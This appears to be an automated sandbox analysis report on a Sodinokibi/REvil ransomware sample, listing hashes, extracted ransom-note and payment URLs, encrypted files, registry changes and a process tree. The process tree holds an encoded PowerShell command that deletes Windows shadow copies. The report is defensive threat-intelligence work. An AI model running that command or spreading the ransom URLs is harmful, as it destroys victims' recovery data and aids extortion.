Analysis
-
max time kernel
35s -
max time network
50s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
18-07-2020 22:55
Static task
static1
Behavioral task
behavioral1
Sample
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
Resource
win10v200430
General
-
Target
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
-
Size
116KB
-
MD5
5b0a782e9b2bc71979e38ef7b2336c3a
-
SHA1
8e14c8062d9fada0f23d1be3cd1ae24437aef093
-
SHA256
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15
-
SHA512
cf1128c568a08ccdee2806c521e95de30a14d9747efbe50eaff76929c4d744c8ab7a1e592c91cf655a50eb43c63389a27990fab76a2c809585e1399163d3b549
Malware Config
Extracted
C:\ka0gata-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B821AFD3010C9A3C
http://decryptor.cc/B821AFD3010C9A3C
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exedescription pid process target process PID 1500 wrote to memory of 364 1500 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe powershell.exe PID 1500 wrote to memory of 364 1500 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe powershell.exe PID 1500 wrote to memory of 364 1500 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe powershell.exe PID 1500 wrote to memory of 364 1500 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 34 IoCs
Processes:
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exedescription ioc process File opened for modification \??\c:\program files\CloseOpen.m3u 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\UnlockUndo.mpeg2 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\ka0gata-readme.txt 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\ConvertRevoke.MTS 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\InstallClear.xls 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\OptimizeNew.wvx 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\ResumeMount.ogg 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\SearchTrace.midi 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\SendSubmit.avi 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\RestoreTest.temp 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\TraceRepair.otf 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\ConfirmResize.mpv2 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\HideSend.xht 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\MeasureEnter.mov 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File created \??\c:\program files\microsoft sql server compact edition\ka0gata-readme.txt 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\ProtectRename.xps 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\RestoreRequest.rar 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\InvokeApprove.png 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\DisableJoin.html 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\SwitchGet.crw 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\UnprotectEnable.png 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File created \??\c:\program files\ka0gata-readme.txt 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\ApproveSwitch.wm 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\TraceUpdate.emf 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\AddDeny.xps 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\BlockReset.txt 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\ConnectWatch.mpeg3 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\RestoreDebug.ogg 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ka0gata-readme.txt 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File created \??\c:\program files (x86)\ka0gata-readme.txt 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\PingStep.ini 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\ReadDeny.rm 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\SkipDisable.M2T 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe File opened for modification \??\c:\program files\UnregisterWait.docx 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8t6591c1.bmp" 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1500 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeBackupPrivilege 1848 vssvc.exe Token: SeRestorePrivilege 1848 vssvc.exe Token: SeAuditPrivilege 1848 vssvc.exe Token: SeTakeOwnershipPrivilege 1500 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exepowershell.exepid process 1500 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe 364 powershell.exe 364 powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe"C:\Users\Admin\AppData\Local\Temp\2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:364
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1096
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1848